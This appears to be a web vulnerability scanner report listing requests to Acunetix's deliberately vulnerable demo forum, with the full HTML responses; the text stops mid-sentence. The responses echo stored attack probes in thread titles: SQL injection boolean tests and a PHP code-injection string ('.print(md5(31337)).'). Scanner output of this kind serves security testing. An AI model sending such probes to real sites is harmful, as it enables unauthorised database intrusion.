URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:48 GMT Content-Length: 3113 |
Response Body - size: 3,113 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum '.print(md5(31337)).' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/'.print(md5(31337)).' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>'.print(md5(31337)).' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:53 GMT Content-Length: 3178 |
Response Body - size: 3,178 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=41 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=41 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=41 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:53 GMT Content-Length: 3172 |
Response Body - size: 3,172 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2<(0+5+983-983) or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2<(0+5+983-983) or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2<(0+5+983-983) or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=42 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=42 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=42 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:53 GMT Content-Length: 3172 |
Response Body - size: 3,172 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2>(0+5+983-983) or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2>(0+5+983-983) or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2>(0+5+983-983) or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=43 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=43 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=43 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:53 GMT Content-Length: 3142 |
Response Body - size: 3,142 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 2+781-781-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 2+781-781-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 2+781-781-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=44 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=44 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=44 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:53 GMT Content-Length: 3142 |
Response Body - size: 3,142 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 3+781-781-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 3+781-781-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 3+781-781-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=45 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=45 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=45 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:53 GMT Content-Length: 3136 |
Response Body - size: 3,136 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 3*2<(0+5+781-781) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 3*2<(0+5+781-781) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 3*2<(0+5+781-781) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=46 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=46 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=46 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:54 GMT Content-Length: 3136 |
Response Body - size: 3,136 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 3*2>(0+5+781-781) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 3*2>(0+5+781-781) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 3*2>(0+5+781-781) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to 